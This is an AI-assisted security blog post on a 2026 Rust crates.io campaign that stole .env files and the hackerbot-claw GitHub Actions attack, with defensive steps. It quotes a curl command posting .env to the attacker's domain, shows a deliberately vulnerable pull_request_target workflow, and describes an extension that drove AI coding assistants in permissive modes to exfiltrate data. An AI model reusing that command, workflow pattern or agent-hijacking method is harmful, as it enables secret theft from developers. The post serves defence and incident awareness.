Commissioned, Curated and Published by Russ. Researched and written with AI.
What’s New
Socket’s Threat Research Team confirmed all five malicious crates have been removed from crates.io and the publisher account suspended. The Trivy VS Code extension compromise (CVE-2026-28353) has been remediated: the malicious versions 1.8.12 and 1.8.13 have been removed from Open VSX, and Aqua Security has revoked the tokens used to publish them. If you run open source repos, the pull_request_target audit is the most urgent action item right now.
Changelog
| Date | Summary |
|---|---|
| 11 Mar 2026 | Initial publication covering the five malicious Rust crates and the hackerbot-claw GitHub Actions campaign. |
In February 2026, someone published five Rust crates to crates.io. They were framed as time utilities – local time calibration without NTP, useful for constrained networks and CI environments. They were not time utilities. They were credential theft tools, and they ran against developer machines and CI pipelines every time someone called them.
Socket’s Threat Research Team caught the campaign. The crates are gone. But the attack surface that made this possible is still there, and it’s not specific to Rust.
The Crates Campaign
The five packages – chrono_anchor, dnp3times, time_calibrator, time_calibrators, and time-sync – were published between late February and early March 2026. Socket assessed with high confidence that all five came from the same threat actor, based on shared infrastructure, identical exfiltration logic, and a lookalike domain: timeapis[.]io, impersonating the legitimate timeapi.io service.
Four of the crates were straightforward: find the .env file, POST it to the attacker’s server via curl, done. No persistence, no complex exploitation. Just curl -F "env=@.env" http://timeapis.io/... fired in a background thread.
chrono_anchor was more considered. The exfiltration logic lived inside guard.rs, invoked from what looked like routine parameter validation. The crate first sent a legitimate HTTPS request to timeapi.io as cover traffic – making it look like a genuine time check – then quietly downgraded to HTTP and POSTed the .env file to the lookalike domain. One character difference in the hostname. One letter appended. The kind of thing that doesn’t jump out in a quick review.
The crates were framed around a plausible use case. “Local time calibration without NTP” is a real problem in restricted network environments. That framing lowered reviewer scepticism. chrono_anchor borrowed from the widely-used chrono ecosystem name; dnp3times typosquatted the legitimate dnp3time crate. These are standard supply chain attack techniques, now applied to the Rust ecosystem.
time_calibrators was removed about three hours after publication. time-sync lasted roughly fifty minutes. chrono_anchor survived longest, until Socket identified and reported it. The crates.io security team yanked it and suspended the publishing account.
Sixty-six downloads of chrono_anchor before removal. We don’t know how many of those ran in CI.
The GitHub Actions Attack
Running alongside the crates campaign – active in the same period, but assessed as a separate operation – was hackerbot-claw, an AI-powered bot targeting open source CI/CD pipelines.
Between February 21 and February 28, 2026, the GitHub account (which described itself as an “autonomous security research agent”) targeted at least seven repositories belonging to Microsoft, Datadog, Aqua Security, and others. The attack chain: scan public repositories for misconfigured GitHub Actions workflows, fork the target repo, open a pull request with a trivial-looking change, trigger CI, steal secrets.
The specific misconfiguration it hunted was pull_request_target.
Here’s why that trigger is a problem. GitHub Actions has two relevant triggers for pull requests: pull_request and pull_request_target. The pull_request trigger runs in the context of the fork – it gets read-only access and no repository secrets. That’s the safe one.
pull_request_target runs in the context of the base repository. It has write permissions. It has access to repository secrets. It exists because there’s a legitimate need: running a full test suite on community PRs without requiring fork contributors to have repository secrets. But the documented risk is that if the workflow executes code from the PR under pull_request_target, that code runs with the base repository’s credentials.
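That risky shape looks something like the following – a minimal sketch, with the workflow name, script path, and checkout details invented for illustration rather than taken from any targeted repo:

```yaml
# VULNERABLE sketch: pull_request_target grants repository secrets and a
# write-capable token; explicitly checking out the PR head and then running
# a script from it executes attacker-controlled code with those credentials.
name: ci
on: pull_request_target
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}  # untrusted PR code
      - run: ./scripts/test.sh  # attacker controls this file's contents
```

The trigger alone isn’t the bug; the combination of the trigger with checking out and executing the PR’s code is.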
Hackerbot-claw exploited this directly. The most high-profile target was aquasecurity/trivy, a popular open source security scanner. StepSecurity documented the attack: the bot submitted a PR with a concealed malicious payload (hidden in branch names, filenames, or CI scripts alongside a trivial visible change), the pull_request_target workflow triggered on the PR, and the bot’s code executed with repository write access. The stolen Personal Access Token was then used to push a malicious version of Trivy’s VS Code extension to the Open VSX registry.
That extension – versions 1.8.12 and 1.8.13 – then weaponised local AI coding assistants. It ran Claude, Codex, Gemini, GitHub Copilot CLI, and Kiro CLI in permissive modes, instructed them to perform system inspection, and exfiltrated the results using the victim’s own authenticated GitHub CLI session. The attack vector adapted mid-campaign: version 1.8.12 scattered output to random channels with no reliable collection mechanism; 1.8.13 fixed that by using the victim’s own GitHub account as the exfiltration channel. Iteration. The attacker was debugging their own malware.
Aqua has since revoked the tokens, removed the artifacts, and issued CVE-2026-28353. If you installed those extension versions from Open VSX, remove them now and rotate your environment secrets.
.env as Universal Target
The crates didn’t target a specific secret. They targeted .env. That’s the whole attack.
.env files are how modern development teams handle secrets at the edges of their workflows. API keys, database passwords, cloud provider credentials, GitHub tokens, registry tokens. Excluded from version control, present everywhere else: local dev environments, CI runners, staging boxes. The dotenv convention is simple, portable, and ubiquitous.
That ubiquity is the attack surface. A malicious dependency doesn’t need to know what secrets you have. It just needs to upload .env and let the attacker sort through it. Low complexity, high yield.
The crates didn’t establish persistence. They didn’t install services or scheduled tasks. They didn’t need to. Every time the affected code path ran – during development, during CI, during testing – the crate attempted to exfiltrate secrets again. In a CI environment that runs on every commit, that’s a lot of attempts.
Treat .env files the way you’d treat a private key file. Scope them aggressively. Consider secret managers (AWS Secrets Manager, HashiCorp Vault, GitHub Secrets) for CI workloads rather than .env files on disk. At minimum, ensure CI runners can’t make arbitrary outbound network requests – the curl call in these crates would have been stopped cold by proper egress filtering.
The AI-PR Normalisation Problem
The fact that hackerbot-claw submitted AI-generated PRs designed to look like genuine contributions is the new element worth sitting with.
Open source maintainers have always reviewed incoming PRs for obvious malice. A PR that adds a typo fix in the README while hiding a payload in a CI script is a social engineering attack on reviewer attention. Maintainers scan for suspicious changes. They’re less likely to scrutinise a diff that looks like a normal community contribution.
AI-generated PRs that mimic legitimate contributions raise the baseline difficulty of that review. If the visible change looks genuine – correct code style, reasonable commit message, coherent PR description – it requires active adversarial thinking to catch the embedded payload. Pillar Security assessed hackerbot-claw as a human operator using an LLM as an execution layer, not a fully autonomous agent. But the effect is the same: the friction between “spot the malicious PR” and “merge the community contribution” has decreased.
This is the supply chain attack updated for an era where AI-generated code is normal. Reviewers will increasingly need to treat PR review as a security control, not just a quality control – especially for CI workflow changes. A PR that touches .github/workflows/ should get more scrutiny than one that updates docs, regardless of how legitimate it looks.
See also: the AI clinejection attack on supply chains, and CI/CD privilege separation for the structural mitigations.
What to Do Today
Check your Cargo.lock right now. Search for chrono_anchor, dnp3times, time_calibrator, time_calibrators, time-sync. If any are present, assume possible exfiltration and rotate any secrets that existed in .env files in that project’s working directory.
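A quick way to script that check – the crate names come from the Socket report; the helper function name and the demo lockfile below are illustrative:

```shell
# check_lockfile: scan a Cargo.lock for the five malicious crate names.
# Exit status 0 means at least one match was found.
check_lockfile() {
  grep -E 'name = "(chrono_anchor|dnp3times|time_calibrator|time_calibrators|time-sync)"' "$1"
}

# Demo against a synthetic lockfile entry (illustrative only):
printf 'name = "chrono_anchor"\nversion = "0.2.1"\n' > /tmp/demo.lock
check_lockfile /tmp/demo.lock && echo "hit: rotate secrets"
```

The closing quote in the pattern matters: it keeps time_calibrator from also matching time_calibrators, so each hit names exactly one crate.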
Audit every GitHub Actions workflow using pull_request_target. Run this across your repositories:
```shell
grep -r "pull_request_target" .github/workflows/
```
For each match: does the workflow execute code from the PR? If yes, it’s vulnerable. The fix is to switch to pull_request for fork PRs, which runs in the fork context without repository secrets. If you need pull_request_target for a legitimate reason (e.g., leaving comments on PRs that require write access), make sure no untrusted code from the PR branch executes in that workflow.
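The safe shape, as a sketch (workflow details again illustrative):

```yaml
# SAFER sketch: plain pull_request runs in the fork's context with a
# read-only token and no repository secrets.
name: ci
on: pull_request
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4   # checks out the PR merge ref by default
      - run: ./scripts/test.sh      # still untrusted code, but no secrets to steal
```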
Run cargo-audit in CI. It checks your dependencies against the RustSec advisory database, which now includes all five of these crates. cargo-deny provides broader policy enforcement, including license and source allowlists. Both should be standard practice for any Rust project. Neither is optional in 2026.
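Wiring that into CI can be as small as the following sketch – the workflow and job names are illustrative, and installing from source each run is the simplest option, not the fastest:

```yaml
# Sketch of a CI job running cargo-audit on every push and pull request.
name: supply-chain-audit
on: [push, pull_request]
jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: cargo install cargo-audit --locked
      - run: cargo audit   # non-zero exit if Cargo.lock matches a RustSec advisory
```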
Rotate PATs and secrets if any repo had pull_request_target workflows that accepted external PRs in the last month. Assume compromise, rotate, verify.
Restrict outbound network access in CI. The crate exfiltration relied on curl making HTTP requests to an external domain. Egress filtering in CI runners stops this class of attack regardless of what the dependency does. If your build process doesn’t need to reach timeapis.io, it shouldn’t be able to.
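One lightweight way to express that policy is an explicit allowlist consulted before any outbound call – a sketch, with the hostnames as assumptions; real enforcement belongs at the network layer (firewall or proxy rules), not in build scripts:

```shell
# Hedged sketch of an egress allowlist for a CI wrapper. The hosts listed
# are assumptions for illustration, not a recommended production set.
ALLOWED_HOSTS="crates.io static.crates.io index.crates.io github.com"

# egress_allowed: return 0 if the given host is on the allowlist.
egress_allowed() {
  for host in $ALLOWED_HOSTS; do
    [ "$1" = "$host" ] && return 0
  done
  return 1
}

egress_allowed crates.io   && echo "crates.io: allowed"
egress_allowed timeapis.io || echo "timeapis.io: blocked"
```

Under this policy the crates’ exfiltration POST never leaves the runner, regardless of what the dependency code does.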
Consider cargo-vet for high-trust supply chain requirements. It requires explicit human audits of crate code before use. More friction, but the right friction for security-sensitive or regulated environments.
Closing
Rust’s safety reputation is real and earned. The borrow checker, the absence of memory corruption classes, the type system – these make real security differences. None of that applies to what your dependencies do when they execute.
crates.io has no mandatory code review before publication. There’s no publisher verification beyond email. There’s no automated malware scanning at publication time. npm has been attacked this way for years, and the Rust ecosystem has largely watched from a safe distance. This campaign confirms that distance is gone. The supply chain doesn’t care what language you’re using.
Memory safety and supply chain security are different attack surfaces. Treating one as a proxy for the other is how you end up exfiltrating your own AWS keys to a lookalike domain because you added a time utility to your Cargo.toml.